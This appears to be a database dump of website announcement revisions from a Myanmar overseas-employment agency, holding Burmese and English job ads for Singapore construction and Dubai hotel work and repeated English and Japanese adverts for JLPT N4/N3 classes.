('announcement', 0, 5, 26, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။&nbsp;</p><p>&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 28, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင်General Workerဖြင့်အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း(၅)ဦးအမြန်အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက်(၈)နာရီမှ ညနေ(၅)နာရီထိ အလုပ်လုပ်ချိန်(၈)နာရီ</li><li>တစ်နေ့လုပ်အားခ$$20&nbsp;</li><li>ညနေ(၅)နာရီနောက်ပိုင်းအချိန်ပိုလုပ်ပါက 1.5 Timeအချိန်ပိုကြေးပေးပါမည်</li><li>အစားအသောက်မိမိဘာသာစီစဉ်စားသောက်ရပါမည်</li><li>နေထိုင်စရာအဆောင်ခပေးစရာမလိုပါ</li><li>ရုံးမှကားဖြင့်အကြိုအပိုရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီးသွတ်လက်ဖြက်လပ်သော လူငယ်လူရွယ်များ(၂၀နှစ်မှ၃၅နှစ်)အတွင်း</li><li>ပညာအရည်အချင်းရှိရန်မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လိုနည်းနည်းပြောတတ်ပြီး နည်းနည်းနားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 37, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင်General Workerဖြင့်အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း(၅)ဦးအမြန်အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက်(၈)နာရီမှ ညနေ(၅)နာရီထိ အလုပ်လုပ်ချိန်(၈)နာရီ</li><li>တစ်နေ့လုပ်အားခ$$20&nbsp;</li><li>ညနေ(၅)နာရီနောက်ပိုင်းအချိန်ပိုလုပ်ပါက 1.5 Timeအချိန်ပိုကြေးပေးပါမည်</li><li>အစားအသောက်မိမိဘာသာစီစဉ်စားသောက်ရပါမည်</li><li>နေထိုင်စရာအဆောင်ခပေးစရာမလိုပါ</li><li>ရုံးမှကားဖြင့်အကြိုအပိုရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီးသွတ်လက်ဖြက်လပ်သော လူငယ်လူရွယ်များ(၂၀နှစ်မှ၃၅နှစ်)အတွင်း</li><li>ပညာအရည်အချင်းရှိရန်မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လိုနည်းနည်းပြောတတ်ပြီး နည်းနည်းနားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 42, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင် General Workerဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း(၅)ဦး အမြန် အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက် (၈) နာရီမှ ညနေ (၅) နာရီထိ အလုပ်လုပ်ချိန် (၈)နာရီ</li><li>တစ်နေ့လုပ်အားခ $$20&nbsp;</li><li>ညနေ (၅) နာရီနောက်ပိုင်း အချိန်ပို လုပ်ပါက 1.5 Time အချိန်ပိုကြေး ပေးပါမည်</li><li>အစားအသောက် မိမိဘာသာ စီစဉ် စားသောက်ရပါမည်</li><li>နေထိုင်စရာ အဆောင်ခ ပေးစရာ မလိုပါ</li><li>ရုံးမှကားဖြင့် အကြိုအပို့ ရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီး သွတ်လက် ဖြက်လပ်သော လူငယ်လူရွယ်များ (၂၀နှစ်မှ ၃၅နှစ်) အတွင်း</li><li>ပညာအရည်အချင်းရှိရန် မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လို နည်းနည်းပြောတတ်ပြီး နည်းနည်း နားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 76, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br>Work Hours-<br>&nbsp;</h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', 'full_html'),
('announcement', 0, 10, 16, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', 'full_html'),
('announcement', 0, 18, 59, 'en', 0, '<p>Food&amp;Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', 'full_html'),
('announcement', 0, 62, 383, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 392, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 395, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes</p>', 'full_html'),
('announcement', 0, 62, 395, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 396, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul>', 'full_html'),
('announcement', 0, 62, 396, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 397, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;<br>&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 397, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 398, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;<br>&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 398, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年1月18日</li></ul>', 'full_html'),
('announcement', 0, 62, 399, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;<br>&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 399, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 400, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;<br>&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 400, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 401, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 401, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 402, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 402, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 403, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 403, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 404, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 404, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 405, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 405, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 406, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 406, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
